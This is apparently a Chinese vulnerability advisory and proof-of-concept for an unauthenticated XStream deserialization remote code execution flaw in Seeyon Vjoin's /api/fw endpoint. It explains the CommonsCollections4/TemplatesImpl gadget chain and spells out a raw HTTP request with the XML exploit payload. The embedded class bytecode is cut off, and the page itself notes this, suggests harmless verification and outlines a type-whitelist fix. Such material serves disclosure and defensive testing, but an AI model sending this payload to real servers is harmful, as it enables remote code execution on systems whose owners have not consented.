漏洞描述
致远 Vjoin 前台 XStream 反序列化导致 RCE：`POST /api/fw` 接口以 `Content-Type: application/xml` 接收请求体并交给 XStream 反序列化，页面所述为前台（无需认证）即可触发；从下方 payload 能成功投递可知 `TiedMapEntry`/`LazyMap`/`InvokerTransformer`/`TemplatesImpl` 等类型均未被类型白名单拦截。请求体使用的是 CommonsCollections4 + TemplatesImpl 的典型 XStream 利用链：外层 `<map>`/`<entry>` 在重建 HashMap 时对 `TiedMapEntry` 键求哈希，`TiedMapEntry.hashCode()` → `LazyMap.get(key)` → `InvokerTransformer` 对作为 key 的 `TemplatesImpl` 反射调用 `newTransformer()`，最终由 `TemplatesImpl` 从 `__bytecodes` 加载并实例化攻击者提供的类（base64 以 `yv66vg` 即 0xCAFEBABE 开头，为编译后的 Java class；常量池中可见 `com/sun/org/apach…`，与 AbstractTranslet 子类一致），执行其构造/静态初始化逻辑。
注意：(1) 本页请求体在 `<byte-array>` 处已截断，`Content-Length: 6919` 与可见内容不符，该 class 实际执行的动作无法从本页恢复，复现时需自行生成 translet 字节码（建议使用无害动作验证），并由发包工具重新计算 Content-Length；(2) 描述为“前台”漏洞，请求中携带的 `JSESSIONID` Cookie 推测是抓包残留，验证时建议去掉以确认确实无需会话；(3) 通用修复方向为升级 XStream 至启用默认安全框架的版本并通过 `allowTypes*` 显式白名单允许的类型，或不在该接口上对不可信 XML 做反序列化——具体修复版本请以厂商公告为准。
POST /api/fw HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 6919
Content-Type: application/xml
Cookie: JSESSIONID=DD9BA127344D6A59D9BA45FCE1859746
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
<map>
<entry>
<org.apache.commons.collections4.keyvalue.TiedMapEntry>
<map class="org.apache.commons.collections4.map.LazyMap" serialization="custom">
<unserializable-parents/>
<org.apache.commons.collections4.map.LazyMap>
<default>
<factory class="org.apache.commons.collections4.functors.InvokerTransformer">
<iMethodName>newTransformer</iMethodName>
<iParamTypes/>
<iArgs/>
</factory>
</default>
<map/>
</org.apache.commons.collections4.map.LazyMap>
</map>
<key class="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" serialization="custom">
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>t</__name>
<__bytecodes>
<byte-array>yv66vgAAADEBDwEAFVBheWxvYWQyNjg5NTYyNjAwOTkwMAcAAQEAQGNvbS9zdW4vb3JnL2FwYWNo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...[已截断]